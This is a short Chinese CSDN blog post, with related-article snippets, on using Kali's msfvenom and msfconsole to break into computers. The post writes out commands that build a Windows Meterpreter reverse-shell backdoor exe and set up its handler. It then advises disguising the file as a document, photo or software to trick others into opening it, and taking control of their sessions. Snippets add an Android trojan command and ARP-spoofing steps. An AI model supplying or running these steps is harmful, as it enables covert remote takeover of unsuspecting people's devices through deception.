利用kali下的msfvenom入侵电脑

最新推荐文章于 2024-08-15 09:37:02 发布
最新推荐文章于 2024-08-15 09:37:02 发布
阅读量3.1w 收藏 279
点赞数 38
分类专栏: kali 文章标签: msfvenom msfconsole
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41453632/article/details/83475035
版权

需要的工具:msfvenom . msfconsole (kali里面有)

msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe

即生成一个后门文件xss.exe(我这里是将文件名命名为xss的)

然后继续执行命令:

msfconsole          (运行msfconsole)

msf>use exploit/multi/handler  (选择模块)

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

set lhost  ip地址       set lport 加端口号

 

msf exploit(handler) > exploit  -z  -j (后台执行)

这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)

发给别人后,等待别人打开xss.exe,打开即上钩了

msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

进入meterpreter了,即可进行一些相关的木马操作。

毕竟话少
关注
专栏目录
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
kali linux 黑别人电脑,如何使用 Kali Linux 黑掉 Windows
weixin_28769407的博客
05-13 7911
Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于...
(黑客)入侵的四种手段,不知道就危险了!
xiangxueerfei的博客
03-01 3091
科技的飞速发展为我们的生活带来了许多的便利,但是背后同样隐藏着许多的危险,信息安全就是大家都关心的一块区域。现在信息泄漏的问题时有发生,对个人和社会都带来了不好的影响,对本人来说无关紧要的信息,对于黑客来说却有一定的价值,那么黑客一般会用哪些手段来入侵电脑呢?今天我们就一起来看看黑客常用的4种入侵手段,如果你还不知道,希望大家看完后能够提高警惕。当电脑用户在网络上下载一些安全性特别低的文件时,里面可能就会有病毒软件。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
baimao__Ch的博客
08-15 1046
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。最后。
使用Kali linux生成木马入侵局域网安卓手机
WuHao的博客
04-02 2万+
1、首先查看本机ip,这里我本机IP地址为192.168.0.105 2、生成木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 输入上述命令生成木马,这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小 3、启动ms...
kali linux查看局域网下所有IP,并对指定IP攻击
weixin_44145452的博客
08-18 4474
因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击。前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址。来确认本机的ip地址。这样这个攻击就停止了。
kali渗透内网和外网
weixin_62693307的博客
04-17 6387
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
使用KALI实现远程控制PC
weixin_42047210的博客
09-23 9552
使用KALI生成木马病毒实现远程控制 前言    该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。        我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:    1、VMware Workstation Pro 16(虚拟机)    下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.
Kali下安装sublime text3.docx
06-16
Kali Linux操作系统中安装Sublime Text 3是开发者常用的操作,因为Sublime Text是一款功能强大的文本编辑器,尤其受到编程人员的青睐。它支持多种编程语言,具有代码高亮、自动完成、多选编辑、分割视图等功能,极...
利用kali破解wifi密码全过程.doc
10-23
利用kali破解wifi密码全过程.doc
win环境下虚拟机创建及kali的安装
08-02
在Windows环境下创建虚拟机并安装Kali Linux是一个常见的任务,对于进行渗透测试、安全研究或者学习Linux操作系统来说非常实用。本文将详细介绍如何使用VMware在Windows系统上搭建虚拟机,并安装Kali Linux。 首先...
Metasploit简单利用入侵Windows7案例.docx
11-13
### Metasploit简单利用入侵Windows7案例 #### 一、MS17_010漏洞利用实验 ##### 1. 发起漏洞探测 - **背景介绍**:本实验选择了MS17_010(永恒之蓝)漏洞进行攻击尝试。此漏洞允许攻击者在未打补丁的Windows...
Kali渗透测试之六提升权限
服务猿
05-12 3500
◆提升权限:获取目标系统的控制权是渗透成功的标志。审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统级权限。审计人员还可以以该主机为跳板进一步攻击局域网络。(审计人员可能以各种方式获得与被控制系统有关的更多信息,具体地说,他们可能使用嗅探手段截获网络数据包,破解各种服务的密码,在局域网中使用网络欺骗手段...
使用kali对同一局域网内的设备进行断网和查看设备图片
goddreamyyh的博客
01-11 2万+
首先,如果kali是在虚拟机中运行的,需要使用桥接网络。 断网操作 1,首先,查看自己的IP,我的是192.168.1.125 命令:ifconfig 2,然后,查看当前局域网的还有那些设备。 命令:fping -g 192.168.1.125/24 3,然后选择一个设备作为攻击目标,拿自己的手机来做栗子>!< 查看了我的手机的IP为192.168.1.100(拿我...
黑客常用入侵方式(12种)
weixin_68789096的博客
03-10 1万+
在Interent中,为了防止黑客入侵自己的计算机,就必须了解黑客入侵目标计算机的常用方法。黑客常用的入侵方法有数据驱动攻击、系统文件非法利用、伪造信息攻击以及远端操纵等,下面就简单介绍这些入侵方法。(仅供了解)数据驱动攻击是指黑客向目标计算机发送或复制的表面上看来无害的特殊程序被执行时所发起的攻击。该攻击可以让黑客在目标计算机上修改与网络安全有关的文件,从而使黑客在下一次更容易入侵该目标计算机。数据驱动攻击主要包括缓冲区溢出攻击、格式化字符串攻击、输入验证攻击、同步漏洞攻击、信任漏洞攻击等。
黑客的入侵方式你知道几种?
weixin_68789096的博客
03-10 1359
零基础入门对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享 (qq.com)CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享 (qq.com)因篇幅有限,仅展示部分资料,需要点击上方链接即可获取。
kali linux利用MS12-020漏洞入侵windows xp ,windows 7
边城浪子的博客
08-07 2379
实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:windows server 2003 Enterprise x64 SP2 ip:192.168.172.138 条件:必须开启3389端口,并且关闭防火墙。 攻击过程: step1:kali 中打开终端 ,输入msfcole step2:命令:search ms12-020 命令:usea...
利用Kali Linux进行一些简单可操作的攻击
qq_43678263的博客
03-31 1万+
利用Kali Linux进行一些简单可操作的攻击 文章目录一、arp欺骗断网二、内网DDOS三、Metasploit木马远控四、SQL注入 一、arp欺骗断网 arpspoof -i eth0 -t+IPV4+网关 要确认IP转发功能的状态,可以查看/proc文件系统, 使用下面命令: cat /proc/sys/net/ipv4/ip_forward 如果上述文件中的值为0,说明禁止进行IP转发; 如果是1,则说明IP转发功能已经打开。 要想打开IP转发功能, 可以直接修改上述文件: echo 1 &
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
kalimsfvenom
07-27
kalimsfvenom是一个Metasploit的独立后门生成器,也是msfpayload和msfencode的替代品。它可以用来生成各种类型的后门,包括Windows平台上的meterpreter反向TCP连接后门。使用msfvenom可以通过指定参数来生成特定类型的后门,并将其保存为可执行文件。例如,可以使用以下命令生成一个meterpreter反向TCP连接后门,并将其保存为名为mymalware.exe的可执行文件:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.129 lport=6789 -f exe > mymalware.exe。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Kali利用msf渗透Windows电脑(超详细)](https://blog.csdn.net/RFZ_322/article/details/123367668)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [[Kali]--Msfvenom](https://blog.csdn.net/weixin_42633229/article/details/109535621)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值